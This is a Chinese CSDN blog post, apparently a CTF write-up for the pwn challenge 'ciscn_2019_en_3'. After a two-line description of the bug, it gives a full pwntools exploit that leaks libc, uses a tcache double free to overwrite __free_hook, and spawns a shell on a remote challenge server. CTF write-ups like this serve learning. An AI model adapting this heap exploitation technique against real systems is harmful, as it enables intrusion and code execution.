ciscn_2019_en_3

最新推荐文章于 2024-07-02 00:49:50 发布
最新推荐文章于 2024-07-02 00:49:50 发布
阅读量169 收藏
点赞数
分类专栏: PWN 文章标签: 学习 安全 unix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123995012
版权

漏洞点:

可泄露libc

double_free可修改fd指针,到hook,写入one_gadget即可getshell

from pwn import *
from LibcSearcher import * 

local_file  = './en3'
local_libc  = './libc-2.27.so'
# remote_libc = './libc-2.23.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 29171)
    libc = ELF(local_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))


def dbg():
	gdb.attach(r)
	pause()

def add(size,buf):
	ru("Input your choice:")
	sl(str(1))
	ru("Please input the size of story: \n")
	sl(str(size))
	ru("please inpute the story: \n")
	sl(buf)
def free(idx):
	ru("Input your choice:")
	sl(str(4))
	ru("Please input the index:\n")
	sl(str(idx))

ru(b"What's your name?")
sl(b'aaaa')
ru(b'Please input your ID.')
se(b'a'*8)
ru(b'a'*8)
addr = uu64(b'\x7f')
base = addr - 231 - libc.sym['setbuffer']
success("base:"+hex(base))
sys = base + libc.sym['system']
one_gadget = base + 0x4f322
malloc_hook = base + libc.sym['__malloc_hook']
free_hook = base + libc.sym['__free_hook']

add(0x80,'/bin/sh\x00')

free(0)
free(0)

add(0x80,p64(free_hook))
add(0x80,p64(sys))
add(0x80,p64(one_gadget))
free(0)

r.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
scada_5.8.3_full_en
08-02
scada_5.8.3_full_en
ciscn_2019_ne_3
seaaseesa的博客
05-07 427
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
simocode_en
03-16
simocode_en.pdf 介绍了关于simocode_en的详细说明,提供运动控制的技术资料的下载。
罗斯蒙特_1199EN
03-18
介绍了关于罗斯蒙特_1199EN的详细说明,提供罗斯蒙特的技术资料的下载。
e845_Manual_01_2019_EN_manual_
09-30
本手册("e845_Manual_01_2019_EN_manual_")详细介绍了该产品的各项功能、使用方法以及维护技巧,旨在帮助用户充分发挥这款话筒的潜力,提升录音和现场表演的质量。 1. **产品特性** Sennheiser e845 的核心特性...
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1778
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_en_3 Writeup
Calllin的博客
05-09 329
前提与思路 程序逻辑开始处,有两处输入信息然后立即输出进行确认的交互。经调试,但由于缓冲区长度设置问题,第二处输入与程序setbuffer+231的地址在栈中相连。 当输入的字符串末的\x00被截断时,可以引导程序输出setbuffer+231在内存中的地址。 本题部署于Ubuntu GLIBC 2.27-3ubuntu1的环境下。Tcache中的chunk可能可以被double free。使得获得任意区域内存改写能力。 当__hook_free在内存中的地址被改写为one_gadget,执行
ciscn_2019_en_3【write up】
m0_73756460的博客
04-13 79
buu刷题 ciscn_2019_en_3【write up】
【BUUCTF - PWN】ciscn_2019_en_2
古月浪子的博客
03-25 1178
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWN】ciscn_2019_c_1 附件:ciscn_2019_en_2
昇思25天学习打卡营第十天|ShuffleNet图像分类
子殊的博客
06-29 1072
ShuffleNetV1是旷视科技提出的一种计算高效的CNN模型,和MobileNet, SqueezeNet等一样主要应用在移动端,所以模型的设计目标就是利用有限的计算资源来达到最好的模型精度。ShuffleNetV1的设计核心是引入了两种操作:Pointwise Group Convolution和Channel Shuffle,这在保持精度的同时大大降低了模型的计算量。因此,ShuffleNetV1和MobileNet类似,都是通过设计更高效的网络结构来实现模型的压缩和加速。
昇思25天学习打卡营第2天|张量学习
main_h_的博客
06-26 938
张量是一种特殊的数据结构,主要是描述矩阵 行列式这类。张量(Tensor)是MindSpore网络运算中的基本数据结构,类似日常的多维数组,不过比基础的数组多了一些描述信息。
Java程序员学习Go开发Higress的WASM插件
BothSavage
06-26 853
tinygo@0.32+go@1.19无法在macos arm架构下打包。升级go@1.21再次打包提示unsafe.SliceData requires go1.20 or later。后放弃macos+arm,采用ubuntu+amd64打包,ubuntu打包也必须使用tinygo@0.28.1。0.32.0在ubuntu仍然提示unsupported GOOS/GOARCH pair wasip1/wasm。
昇思MindSpore学习笔记2-01 LLM原理和实践 --基于 MindSpore 实现 BERT 对话情绪识别
最新发布
muren的专栏
07-02 674
通过识别BERT对话情绪状态的实例,展现在昇思MindSpore AI框架中大语言模型的原理和实际使用方法、步骤。
昇思25天学习打卡营第10天 | 基于MindNLP+MusicGen生成自己的个性化音乐
cftang9999的专栏
06-28 564
MusicGen是来自Meta AI的Jade Copet等人提出的基于单个语言模型(LM)的音乐生成模型,能够根据文本描述或音频提示生成高质量的音乐样本,相关研究成果参考论文《MusicGen直接使用谷歌的及其权重作为文本编码器模型,并使用及其权重作为音频压缩模型。MusicGen解码器是一个语言模型架构,针对音乐生成任务从零开始进行训练。MusicGen 模型的新颖之处在于音频代码的预测方式。
vi_attr_send_end_en
12-17
vi_attr_send_end_en是指在视觉识别方面的属性发送结束。在计算机视觉领域,vi_attr_send_end_en表示当一个视觉识别系统完成了对特定对象或场景的识别和分析,并且将相应的属性信息发送结束。这意味着系统已经提取出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值